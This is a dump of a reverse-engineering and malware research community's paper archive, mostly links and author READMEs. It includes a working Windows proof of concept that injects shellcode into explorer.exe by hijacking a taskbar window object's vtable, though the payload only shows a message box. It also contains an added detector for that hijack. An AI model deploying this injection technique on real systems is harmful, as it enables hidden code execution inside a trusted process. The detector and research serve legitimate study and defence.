├── An overview of Process , Handles & Tokens
│   ├── Ch6.pdf
│   └── README.md
├── Code Injection using Taskbar
│   ├── CodeInjectionusingTaskbar.pdf
│   ├── README.md
│   ├── asm.asm
│   └── src.cpp
├── Evading Malware Analysis Using Reverse Execution
│   ├── Evading Malware Analysis Using Reverse Execution.pdf
│   └── README.md
├── Investigation of Iranian Cyber Hierarchy
│   ├── Investigation of Iranian Cyber Hierarchy.pdf
│   └── README.md
├── LLVM-IR
│   ├── README.md
│   └── un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf
├── Maldoc_analysis
│   ├── README.md
│   └── report.pdf
├── Mutation Engine for Fun and Profit
│   ├── Mutation Engine For Fun And Profit.pdf
│   └── README.md
├── Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics
│   ├── Ch.2_-_0x1411.pdf
│   └── README.md
├── PTM - Page Table Manipulation From Usermode
│   ├── PTM_1.pdf
│   └── README.md
├── README.md
├── Registry Analysis
│   ├── Ch.7_-_Registry_Analysis_0x1411.pdf
│   └── README.md
├── Summarizing Windows Internals
│   ├── README.md
│   ├── Windows_Internals_I.pdf
│   ├── Windows_Internals_II.pdf
│   └── Windows_Internals_III.pdf
├── Supply-Chain Attacks
│   ├── README.md
│   └── Supply_Chain.pdf
├── Vulnerable Driver Manipulation
│   ├── README.md
│   └── VDM.pdf
└── Windows-Irqls
    ├── Readme.md
    ├── Windows Irqls.pdf
    └── apic.png

/An overview of Process , Handles & Tokens/Ch6.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/An overview of Process , Handles & Tokens/Ch6.pdf
--------------------------------------------------------------------------------
/An overview of Process , Handles & Tokens/README.md:
--------------------------------------------------------------------------------
Study notes by [V](https://twitter.com/0x1411)


**All rights reserved to the authors of An overview of Process , Handles & Tokens**
--------------------------------------------------------------------------------
/Code Injection using Taskbar/CodeInjectionusingTaskbar.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Code Injection using Taskbar/CodeInjectionusingTaskbar.pdf
--------------------------------------------------------------------------------
/Code Injection using Taskbar/README.md:
--------------------------------------------------------------------------------
Author : [x0r19x91](https://twitter.com/x0r19x91)
--------------------------------------------------------------------------------
/Code Injection using Taskbar/asm.asm:
--------------------------------------------------------------------------------
.code

; Position-independent x64 payload (MASM). It is entered from the trampoline that
; src.cpp installs in the hijacked CImpWndProc::Release slot, so it saves every
; register it touches and leaves the stack exactly as it found it.
main:
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15
    mov rax, [count]            ; RIP-relative load; count lives at the end of this blob
    inc qword ptr [count]
    cmp rax, 3
    jge bye                     ; show the message box only on the first three Release calls
    xor ecx, ecx                ; hWnd = NULL
    call next                   ; pushes the address of the string below as the return address
    db "Hello World!", 0

next:
    pop rdx                     ; lpText
    call fuck
    db "x0r19x91", 0

fuck:
    pop r8                      ; lpCaption
    mov r9d, 040h               ; uType = MB_ICONINFORMATION
    mov rax, [fnMessageBoxA]
    call rax                    ; caveat: no 32-byte shadow space is reserved here, so the
                                ; callee may spill its register arguments over the saved
                                ; r12-r15 slots that sit just above rsp

bye:
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    ret

count dq 0
fnMessageBoxA dq 00007FF9D30B2CE0h   ; MessageBoxA on the author's machine; src.cpp patches
                                     ; this last qword with the address resolved at run time

end
--------------------------------------------------------------------------------
/Code Injection using Taskbar/src.cpp:
--------------------------------------------------------------------------------
// Build as x64 without UNICODE defined: the code uses char buffers with the
// TCHAR APIs (lstrcpy, GetWindowText) and narrow string literals.
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <vector>
#pragma comment(lib, "user32")

// Resolve a PID to its image name through a ToolHelp process snapshot.
LPCTSTR pid2name(DWORD dwPid)
{
    static char procName[261];
    HANDLE hSnapshot;
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof entry;   // Process32First fails with ERROR_BAD_LENGTH without this
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return "(none)";
    if (Process32First(hSnapshot, &entry))
    {
        do
        {
            if (entry.th32ProcessID == dwPid)
            {
                lstrcpy(procName, entry.szExeFile);
                CloseHandle(hSnapshot);
                return procName;
            }
        }
        while (Process32Next(hSnapshot, &entry));
    }
    CloseHandle(hSnapshot);
    return "(none)";
}

HWND g_hwndMSTaskListWClass;

// Child-window callback: the MSTaskListWClass window under Shell_TrayWnd carries the
// window text "Running applications" (Windows 10 taskbar). The title is cached in the
// window structure, so GetWindowText works across processes without sending a message.
BOOL WINAPI EnumProc(HWND hWnd, LPARAM lP)
{
    static char szText[128];
    GetWindowText(hWnd, szText, 127);
    if (!lstrcmp(szText, "Running applications"))
    {
        g_hwndMSTaskListWClass = hWnd;
    }
    return TRUE;
}

// First three slots of the vtable of the C++ object that owns the window.
typedef struct {
    UINT64 pfnAddRef;
    UINT64 pfnRelease;
    UINT64 pfnWndProc;
} CImpWndProc;

int main()
{
    DWORD dwPid;
    SIZE_T nRead;

    HWND hwShellTray = FindWindowEx(NULL, NULL, "Shell_TrayWnd", NULL);
    printf("[<] ShellTrayWnd: %p\n", hwShellTray);

    EnumChildWindows(hwShellTray, EnumProc, NULL);
    if (!g_hwndMSTaskListWClass)
    {
        printf("[-] No \"Running applications\" window under Shell_TrayWnd\n");
        return 1;
    }

    printf("[*] Running applications: %p\n", g_hwndMSTaskListWClass);
    GetWindowThreadProcessId(g_hwndMSTaskListWClass, &dwPid);
    printf("[*] Process: %s (%lu)\n", pid2name(dwPid), dwPid);

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    printf("[*] Handle: %p\n", hProcess);
    if (!hProcess)
        return 1;

    // The window's extra bytes (cbWndExtra) at offset 0 hold the object's this-pointer.
    // Window data lives in the shared desktop heap, so GetWindowLongPtr reads it from
    // another process's window without a handle to that process.
    auto m_windowPtr = GetWindowLongPtr(g_hwndMSTaskListWClass, 0);
    printf("[*] VTable Ptr Ptr: %p\n", (PVOID)m_windowPtr);

    CImpWndProc m_vTable {};
    UINT64 ptrVTable;
    ReadProcessMemory(hProcess, PVOID(m_windowPtr), &ptrVTable, sizeof ptrVTable, &nRead);
    printf("[*] VTable Ptr: %p\n", PVOID(ptrVTable));
    ReadProcessMemory(hProcess, PVOID(ptrVTable), &m_vTable, sizeof m_vTable, &nRead);
    printf("[CImpWndProc.AddRef] -> %p\n", PVOID(m_vTable.pfnAddRef));
    printf("[CImpWndProc.Release] -> %p\n", PVOID(m_vTable.pfnRelease));
    printf("[CImpWndProc.WndProc] -> %p\n", PVOID(m_vTable.pfnWndProc));

    // asm.asm, assembled. Layout: code, then `count` (8 bytes), then `fnMessageBoxA`
    // (8 bytes), 133 bytes in total. unsigned so that bytes >= 0x80 need no narrowing.
    unsigned char payload[] = {
        0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41, 0x54,
        0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B, 0x05, 0x58, 0x00, 0x00, 0x00, 0x48, 0xFF, 0x05,
        0x51, 0x00, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x03, 0x7D, 0x34, 0x33, 0xC9, 0xE8, 0x0D, 0x00, 0x00,
        0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20, 0x57, 0x6F, 0x72, 0x6C, 0x64, 0x21, 0x00, 0x5A, 0xE8,
        0x09, 0x00, 0x00, 0x00, 0x78, 0x30, 0x72, 0x31, 0x39, 0x78, 0x39, 0x31, 0x00, 0x41, 0x58, 0x41,
        0xB9, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x05, 0x21, 0x00, 0x00, 0x00, 0xFF, 0xD0, 0x41, 0x5F,
        0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 0x41, 0x58, 0x5D, 0x5F,
        0x5E, 0x5A, 0x59, 0x5B, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x2C, 0x0B,
        0xD3, 0xF9, 0x7F, 0x00, 0x00};
    size_t payloadSize = sizeof payload;

    // asm.asm hard-codes the author's MessageBoxA address in its last qword. System DLLs
    // are mapped at the same base in every process of a boot session, so the address
    // resolved in this process is also valid inside explorer.exe; patch it in first.
    UINT64 fnMessageBoxA = (UINT64)GetProcAddress(GetModuleHandle("user32.dll"), "MessageBoxA");
    memcpy(payload + payloadSize - sizeof fnMessageBoxA, &fnMessageBoxA, sizeof fnMessageBoxA);

    // Replacement vtable (three slots) and a page for the payload plus trampoline.
    auto vTableMem = (UINT64) VirtualAllocEx(hProcess, NULL, 32, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    printf("New VTable: %p\n", PVOID(vTableMem));
    auto vMem = (UINT64)VirtualAllocEx(hProcess, NULL, 4096, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, PVOID(vMem), payload, payloadSize, &nRead);

    printf("[*] Payload Addr: %#016llx\n", vMem);

    // Trampoline that becomes the new Release:
    //   mov rax, vMem ; call rax ; mov rax, old_release ; jmp rax
    // The payload preserves every register, so rcx (this) still reaches the real Release.
    std::vector<uint8_t> shellcode;

    // mov rax, vMem
    shellcode.push_back(uint8_t(0x48));
    shellcode.push_back(uint8_t(0xb8));

    for (int i = 0; i < 8; i++)
        shellcode.push_back(uint8_t(vMem >> i*8 & 0xff));

    // call rax
    shellcode.push_back(uint8_t(0xff));
    shellcode.push_back(uint8_t(0xd0));

    // mov rax, old_release
    shellcode.push_back(uint8_t(0x48));
    shellcode.push_back(uint8_t(0xb8));

    for (int i = 0; i < 8; i++)
        shellcode.push_back(uint8_t(m_vTable.pfnRelease >> i*8 & 0xff));

    // jmp rax
    shellcode.push_back(uint8_t(0xff));
    shellcode.push_back(uint8_t(0xe0));

    printf("Press Enter To Exploit!\n");
    getchar();

    // The trampoline follows the payload in the same page, rounded up to 16 bytes.
    auto shellcodeAddr = (vMem + payloadSize + 15) & ~UINT64(15);
    m_vTable.pfnRelease = shellcodeAddr;
    printf("[*] Shellcode Addr: %#016llx\n", shellcodeAddr);
    WriteProcessMemory(hProcess, PVOID(shellcodeAddr), shellcode.data(), shellcode.size(), &nRead);
    WriteProcessMemory(hProcess, PVOID(vTableMem), &m_vTable, sizeof m_vTable, &nRead);
    // Swap the object's vtable pointer; explorer's next Release call runs the payload.
    // Only three slots are copied, so this assumes nothing past WndProc is called through
    // the table (the rest of the new page is zero and would fault).
    WriteProcessMemory(hProcess, PVOID(m_windowPtr), &vTableMem, sizeof vTableMem, &nRead);

    CloseHandle(hProcess);
}
--------------------------------------------------------------------------------
/Evading Malware Analysis Using Reverse Execution/Evading Malware Analysis Using Reverse Execution.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Evading Malware Analysis Using Reverse Execution/Evading Malware Analysis Using Reverse Execution.pdf
--------------------------------------------------------------------------------
/Evading Malware Analysis Using Reverse Execution/README.md:
--------------------------------------------------------------------------------
## Topic

- Evading Malware Analysis Using Reverse Execution


## Abstract

- Malware is a security threat, and various means are
adapted to detect and block them. In this paper, we demonstrate
a method where malware can evade malware analysis. The
method is based on single-step reverse execution of code using
the self-debugging feature. We discuss how self-debugging code
works and use that to derive reverse execution for any payload.
Further, we demonstrate the feasibility of a detection evading
malware through a real implementation that targets Linux x86-64
architecture for a reference implementation. The reference
implementation produces one result when run in one direction
and a different result when run in the reverse direction.


## Content Type

- Research Paper


## Author/s

- [Adhokshaj Mishra](https://www.linkedin.com/in/adhokshajmishra/)
- [Animesh Roy](https://www.linkedin.com/in/anir0y/)
- [Manjesh K. Hanawal](https://www.ieor.iitb.ac.in/mhanawal)
--------------------------------------------------------------------------------
/Investigation of Iranian Cyber Hierarchy/Investigation of Iranian Cyber Hierarchy.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Investigation of Iranian Cyber Hierarchy/Investigation of Iranian Cyber Hierarchy.pdf
--------------------------------------------------------------------------------
/Investigation of Iranian Cyber Hierarchy/README.md:
--------------------------------------------------------------------------------
Author : [Argonyte](https://twitter.com/argonyte)
--------------------------------------------------------------------------------
/LLVM-IR/README.md:
--------------------------------------------------------------------------------
# A Journey to understand LLVM-IR
Download it from [here!](https://github.com/AXI4L/Community-Papers/blob/master/LLVM-IR/un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf)

Author : [Elemental X](https://twitter.com/ElementalX2)
--------------------------------------------------------------------------------
/LLVM-IR/un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/LLVM-IR/un-devs-github-io-low-level-exploration-journey-to-understanding-llvm-ir---1.pdf
--------------------------------------------------------------------------------
/Maldoc_analysis/README.md:
--------------------------------------------------------------------------------
Author : [weeb.exe](https://twitter.com/OneeSansOnly)
--------------------------------------------------------------------------------
/Maldoc_analysis/report.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Maldoc_analysis/report.pdf
--------------------------------------------------------------------------------
/Mutation Engine for Fun and Profit/Mutation Engine For Fun And Profit.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Mutation Engine for Fun and Profit/Mutation Engine For Fun And Profit.pdf
--------------------------------------------------------------------------------
/Mutation Engine for Fun and Profit/README.md:
--------------------------------------------------------------------------------
## Topic

* Mutation Engine for Fun And Profit

## Agenda

- Writing a metamorphic engine
- Compile-time mutation: what and why?
- Programming the programming language
- Compile-time evaluation
- Obfuscating data
- Obfuscating code
- Detection and analysis of mutation engines


## Content Type

- Slides

## Author

- [ADHOKSHAJ MISHRA](https://www.linkedin.com/in/adhokshajmishra/)
--------------------------------------------------------------------------------
/Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics/Ch.2_-_0x1411.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics/Ch.2_-_0x1411.pdf
--------------------------------------------------------------------------------
/Overview_of_Data_Structures_from_The_Art_of_Memory_Forensics/README.md:
--------------------------------------------------------------------------------
Study notes by [V](https://twitter.com/0x1411)


**All rights reserved to the authors of The Art of Memory Forensics**
--------------------------------------------------------------------------------
/PTM - Page Table Manipulation From Usermode/PTM_1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/PTM - Page Table Manipulation From Usermode/PTM_1.pdf
--------------------------------------------------------------------------------
/PTM - Page Table Manipulation From Usermode/README.md:
--------------------------------------------------------------------------------
This user-mode C++ library builds on VDM and can be used to manipulate all memory, virtual and physical, from user mode.

Author : [xeroxz](https://twitter.com/_xeroxz)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Community-Papers
AX1AL is a small community and semi-research group consisting mostly of enthusiasts interested in Reverse Engineering, Malware and Windows Internals. Papers, blogs and all other contributions
will be added to the community papers archive with full credit. Thank you for your time.

# Authors

* [Amr](https://twitter.com/0x1411)
* [Suvaditya Sur](https://twitter.com/suvaditya_)
* [Adhokshaj Mishra](https://www.linkedin.com/in/adhokshajmishra/)
* [Animesh Roy](https://www.linkedin.com/in/anir0y/)
* [Manjesh K. Hanawal](https://www.ieor.iitb.ac.in/mhanawal)
* [Argonyte](https://twitter.com/argonyte)
* [weeb.exe](https://twitter.com/OneeSansOnly)
* [IDontCode](https://twitter.com/_xeroxz)
* S.Patil
* [Interpolice // 0xastr0](https://discord.gg/CBRTkh5MFB)
* [Ferib Hellscream](https://twitter.com/FeribHellscream)

Thank you to all the authors for their contributions.
--------------------------------------------------------------------------------
/Registry Analysis/Ch.7_-_Registry_Analysis_0x1411.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Registry Analysis/Ch.7_-_Registry_Analysis_0x1411.pdf
--------------------------------------------------------------------------------
/Registry Analysis/README.md:
--------------------------------------------------------------------------------
**A mindmap describing key concepts of Registry Analysis by [Amr](https://twitter.com/0x1411).**

[Download it here.](https://github.com/AXI4L/Community-Papers/blob/master/Registry%20Analysis/Ch.7_-_Registry_Analysis_0x1411.pdf)
--------------------------------------------------------------------------------
/Summarizing Windows Internals/README.md:
--------------------------------------------------------------------------------
Study notes by [V](https://twitter.com/0x1411)

All rights reserved to Pavel Yosifovich and Pluralsight.
--------------------------------------------------------------------------------
/Summarizing Windows Internals/Windows_Internals_I.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Summarizing Windows Internals/Windows_Internals_I.pdf
--------------------------------------------------------------------------------
/Summarizing Windows Internals/Windows_Internals_II.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Summarizing Windows Internals/Windows_Internals_II.pdf
--------------------------------------------------------------------------------
/Summarizing Windows Internals/Windows_Internals_III.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Summarizing Windows Internals/Windows_Internals_III.pdf
--------------------------------------------------------------------------------
/Supply-Chain Attacks/README.md:
--------------------------------------------------------------------------------
Author : RJ45#7284 (Discord)
--------------------------------------------------------------------------------
/Supply-Chain Attacks/Supply_Chain.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Supply-Chain Attacks/Supply_Chain.pdf
--------------------------------------------------------------------------------
/Vulnerable Driver Manipulation/README.md:
--------------------------------------------------------------------------------
Author : [Xeroxz](https://twitter.com/_xeroxz)
--------------------------------------------------------------------------------
/Vulnerable Driver Manipulation/VDM.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Vulnerable Driver Manipulation/VDM.pdf
--------------------------------------------------------------------------------
/Windows-Irqls/Readme.md:
--------------------------------------------------------------------------------
Author : [astr0](https://twitter.com/0xastr0)

In this paper we explain how "Task Priority" and IRQLs work internally in Windows, and at the end of the paper I provide a poster
explaining the "Interrupt Handling" flow on Pentium 4 and Intel Xeon processors. Before we start, I would like to give
special thanks to [Ahmed Bahaa](https://www.linkedin.com/in/ahmad-bahaa-2367148b) for helping me a lot with formatting the paper. Thank you.

Also special thanks to [sinaei](https://twitter.com/Intel80x86?s=09), [drew](https://twitter.com/drewbervisor?s=09) and [xeroxz](https://twitter.com/_xeroxz?s=09) for reviewing the paper.
--------------------------------------------------------------------------------
/Windows-Irqls/Windows Irqls.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Windows-Irqls/Windows Irqls.pdf
--------------------------------------------------------------------------------
/Windows-Irqls/apic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RixedLabs/Community-Papers/e90ea6ad2d34008b11acdca19dfa1d5a037f077a/Windows-Irqls/apic.png
--------------------------------------------------------------------------------
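Added example, not a file from the Community-Papers repository: a read-only detector for the vtable swap that `Code Injection using Taskbar/src.cpp` performs. It reuses the PoC's own lookup (Shell_TrayWnd, the child whose text is "Running applications", the this-pointer in the window's extra bytes), reads the object's vtable pointer with only PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, and classifies the region that holds it with VirtualQueryEx: a compiler-emitted vtable sits inside a mapped image (MEM_IMAGE), whereas the table the injector installs is a private RWX allocation. The `Region` and `Verdict` types, `sample_regions()` and the sample addresses are constructed for this example; the Windows-specific part compiles only under `_WIN32`, and elsewhere the classifier runs on the constructed sample.

```cpp
#include <cstdint>
#include <cstdio>
#include <vector>

// Where the vtable pointer read from the MSTaskListWClass object points.
enum class Verdict { InImage, OutsideImage, Unmapped };

// One committed region of the target process, as VirtualQueryEx reports it.
struct Region {
    std::uint64_t base;
    std::uint64_t size;
    bool image;     // MEM_IMAGE: backed by a mapped PE (explorer.exe or a DLL)
    bool writable;  // PAGE_READWRITE / WRITECOPY / EXECUTE_READWRITE / EXECUTE_WRITECOPY
};

// A compiler-emitted vtable lives in a mapped image. The table src.cpp installs comes
// from VirtualAllocEx(PAGE_EXECUTE_READWRITE), a private non-image region, so the
// region type of the address alone separates the legitimate case from the hijack.
Verdict classify(std::uint64_t vtable, const std::vector<Region>& regions) {
    for (const Region& r : regions)
        if (vtable >= r.base && vtable < r.base + r.size)
            return r.image ? Verdict::InImage : Verdict::OutsideImage;
    return Verdict::Unmapped;
}

// Constructed sample (not captured from a real explorer.exe): two image regions and
// one private RWX page of the kind the injector allocates for its replacement table.
std::vector<Region> sample_regions() {
    return {
        {0x00007FF6A0000000ULL, 0x00500000ULL, true,  false},  // explorer.exe image
        {0x00007FF9D2FF0000ULL, 0x00200000ULL, true,  false},  // user32.dll image
        {0x000001E2C0000000ULL, 0x00001000ULL, false, true},   // private RWX page
    };
}

#ifdef _WIN32
#include <windows.h>

static HWND g_taskList;

// Same lookup src.cpp uses: the child of Shell_TrayWnd titled "Running applications".
static BOOL CALLBACK FindTaskList(HWND h, LPARAM) {
    char text[64];
    GetWindowTextA(h, text, sizeof text);
    if (lstrcmpA(text, "Running applications") == 0) { g_taskList = h; return FALSE; }
    return TRUE;
}

// Walk the target's address space once and record every committed region.
std::vector<Region> live_regions(HANDLE hProcess) {
    std::vector<Region> out;
    MEMORY_BASIC_INFORMATION mbi;
    std::uint64_t addr = 0;
    while (VirtualQueryEx(hProcess, (LPCVOID)addr, &mbi, sizeof mbi) == sizeof mbi) {
        if (mbi.State == MEM_COMMIT)
            out.push_back({(std::uint64_t)mbi.BaseAddress, (std::uint64_t)mbi.RegionSize,
                           mbi.Type == MEM_IMAGE,
                           (mbi.Protect & (PAGE_READWRITE | PAGE_WRITECOPY |
                                           PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)) != 0});
        addr = (std::uint64_t)mbi.BaseAddress + mbi.RegionSize;
    }
    return out;
}

int main() {
    EnumChildWindows(FindWindowA("Shell_TrayWnd", NULL), FindTaskList, 0);
    if (!g_taskList) { printf("no \"Running applications\" window found\n"); return 1; }
    DWORD pid = 0;
    GetWindowThreadProcessId(g_taskList, &pid);
    // Reading is enough for a check; the PoC's PROCESS_ALL_ACCESS is not needed.
    HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (!h) { printf("OpenProcess(%lu) failed: %lu\n", pid, GetLastError()); return 1; }
    std::uint64_t obj = (std::uint64_t)GetWindowLongPtrA(g_taskList, 0), vtable = 0;
    SIZE_T n = 0;
    ReadProcessMemory(h, (LPCVOID)obj, &vtable, sizeof vtable, &n);
    Verdict v = classify(vtable, live_regions(h));
    CloseHandle(h);
    printf("object %p vtable %p: %s\n", (void*)obj, (void*)vtable,
           v == Verdict::InImage ? "inside a mapped image (expected)"
         : v == Verdict::OutsideImage ? "OUTSIDE any image: vtable hijack suspected" : "unmapped");
    return v == Verdict::InImage ? 0 : 2;
}
#else
int main() {
    // Off Windows, exercise the classifier on the constructed sample only.
    const char* names[] = {"InImage", "OutsideImage", "Unmapped"};
    std::uint64_t probes[] = {0x00007FF6A0123456ULL, 0x000001E2C0000000ULL, 0x0000000000001000ULL};
    for (std::uint64_t p : probes)
        printf("%#018llx -> %s\n", (unsigned long long)p, names[(int)classify(p, sample_regions())]);
    return 0;
}
#endif
```

Build it as x64 and run it before and after the PoC's "Press Enter To Exploit!" step: the verdict flips from InImage to OutsideImage once src.cpp has written `vTableMem` into the window's extra bytes. Exit code 2 marks the suspicious case so the check can be scripted. If the taskbar has no window titled "Running applications", the lookup fails and the program exits 1, the same limitation the PoC has.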